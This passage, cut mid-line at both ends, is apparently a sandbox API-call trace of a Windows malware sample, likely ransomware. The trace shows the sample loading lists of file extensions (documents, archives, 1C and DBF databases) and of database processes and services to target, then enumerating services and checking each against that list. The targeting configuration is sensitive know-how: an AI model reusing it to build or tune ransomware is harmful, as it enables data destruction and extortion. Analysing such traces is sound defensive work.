Size=0x40) returned 0x60b2c0 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b2c0, Size=0x80) returned 0x6078d0 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x603d38 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d2a0 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d240 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d190 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067a0 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d290 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606770 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d290, Size=0x8) returned 0x60d210 [0189.624] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6066c8 [0189.624] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d210, Size=0x10) returned 0x606848 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6067b8 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6066e0 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606848, Size=0x20) returned 0x601458 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606740 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606890 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d2a0, Size=0x8) returned 0x60d110 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d240, Size=0x8) returned 0x60d2d0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d150 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606680 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d130 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606950 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d130, Size=0x8) returned 0x60d2b0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606668 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d2b0, Size=0x10) returned 0x606728 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606788 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d100 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606728, Size=0x20) returned 0x6014a8 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d110, Size=0x10) returned 0x606908 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d2d0, Size=0x10) returned 0x606710 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d220 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606938 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d2d0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606848 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d2d0, Size=0x8) returned 0x60d270 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d1c0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606728 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d2b0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6067d0 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d2b0, Size=0x8) returned 0x60d1d0 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606908, Size=0x20) returned 0x601250 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606710, Size=0x20) returned 0x6012a0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d110 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067e8 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d280 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606908 [0189.625] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d280, Size=0x8) returned 0x60d2d0 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc1b8 [0189.625] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc378 [0189.626] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0189.626] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.626] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19de24 | out: lpWSAData=0x19de24) returned 0 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606710 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606710, Size=0x20) returned 0x601318 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601318, Size=0x40) returned 0x60abb8 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60abb8, Size=0x80) returned 0x6078d0 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606710 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606710, Size=0x20) returned 0x601340 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601340, Size=0x40) returned 0x60b308 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b308, Size=0x80) returned 0x6078d0 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5f3e68 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606710 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d180 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d180, Size=0x8) returned 0x60d230 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc038 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d230, Size=0x10) returned 0x606ae8 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc078 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x601598 [0189.629] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ae8, Size=0x20) returned 0x601340 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x601318 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x5fc098 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6013b8 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606bf0 [0189.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d130 [0189.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x60ae40 [0189.630] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d130, Size=0x8) returned 0x60d230 [0189.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x60b158 [0189.630] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d230, Size=0x10) returned 0x606ae8 [0189.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fc0f8 [0189.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc158 [0189.630] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ae8, Size=0x20) returned 0x601638 [0189.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5faf48 [0189.630] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0189.630] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.630] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0189.630] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f3e68 | out: hHeap=0x5e0000) returned 1 [0189.630] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x601390 [0189.631] EnumServicesStatusExW (in: hSCManager=0x601390, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19ddc0, lpServicesReturned=0x19ddd8, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19ddc0, lpServicesReturned=0x19ddd8, lpResumeHandle=0x0) returned 0 [0189.631] GetLastError () returned 0xea [0189.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x6d9c20 [0189.631] EnumServicesStatusExW (in: hSCManager=0x601390, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d9c20, cbBufSize=0x2090, pcbBytesNeeded=0x19ddc0, lpServicesReturned=0x19ddd8, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d9c20, pcbBytesNeeded=0x19ddc0, lpServicesReturned=0x19ddd8, lpResumeHandle=0x0) returned 1 [0189.632] CloseServiceHandle (hSCObject=0x601390) returned 1 [0189.632] lstrlenW (lpString="Appinfo") returned 7 [0189.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0189.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0189.632] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0189.632] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0189.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0189.633] lstrlenW (lpString="AppXSvc") returned 7 [0189.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0189.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0189.633] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0189.633] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0189.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0189.633] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0189.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.633] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0189.633] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0189.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0189.633] lstrlenW (lpString="Audiosrv") returned 8 [0189.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0189.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0189.633] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0189.633] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0189.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0189.633] lstrlenW (lpString="BFE") returned 3 [0189.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0189.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0189.633] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0189.633] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0189.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0189.634] lstrlenW (lpString="BITS") returned 4 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0189.634] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0189.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0189.634] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0189.634] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0189.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0189.634] lstrlenW (lpString="CDPSvc") returned 6 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0189.634] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0189.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0189.634] lstrlenW (lpString="ClickToRunSvc") returned 13 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0189.634] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0189.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0189.634] lstrlenW (lpString="ClipSVC") returned 7 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0189.634] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0189.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0189.634] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0189.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.634] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0189.635] lstrlenW (lpString="CryptSvc") returned 8 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0189.635] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0189.635] lstrlenW (lpString="DcomLaunch") returned 10 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.635] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0189.635] lstrlenW (lpString="DeviceAssociationService") returned 24 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.635] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0189.635] lstrlenW (lpString="Dhcp") returned 4 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0189.635] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0189.635] lstrlenW (lpString="Dnscache") returned 8 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0189.635] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0189.635] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0189.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0189.635] lstrlenW (lpString="DoSvc") returned 5 [0189.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0189.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0189.636] lstrlenW (lpString="DPS") returned 3 [0189.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0189.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0189.636] lstrlenW (lpString="DusmSvc") returned 7 [0189.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0189.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0189.636] lstrlenW (lpString="EventLog") returned 8 [0189.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0189.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0189.636] lstrlenW (lpString="EventSystem") returned 11 [0189.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0189.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0189.636] lstrlenW (lpString="FontCache") returned 9 [0189.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0189.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0189.636] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0189.636] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0189.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0189.637] lstrlenW (lpString="gpsvc") returned 5 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0189.637] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0189.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0189.637] lstrlenW (lpString="iphlpsvc") returned 8 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0189.637] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0189.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0189.637] lstrlenW (lpString="KeyIso") returned 6 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0189.637] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0189.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0189.637] lstrlenW (lpString="LanmanServer") returned 12 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0189.637] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0189.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0189.637] lstrlenW (lpString="LanmanWorkstation") returned 17 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0189.637] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0189.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0189.637] lstrlenW (lpString="lfsvc") returned 5 [0189.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0189.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0189.637] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0189.638] lstrlenW (lpString="LicenseManager") returned 14 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0189.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0189.638] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0189.638] lstrlenW (lpString="lmhosts") returned 7 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0189.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0189.638] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0189.638] lstrlenW (lpString="LSM") returned 3 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0189.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0189.638] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0189.638] lstrlenW (lpString="MpsSvc") returned 6 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0189.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0189.638] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0189.638] lstrlenW (lpString="NcbService") returned 10 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0189.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0189.638] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0189.638] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0189.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0189.638] lstrlenW (lpString="netprofm") returned 8 [0189.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 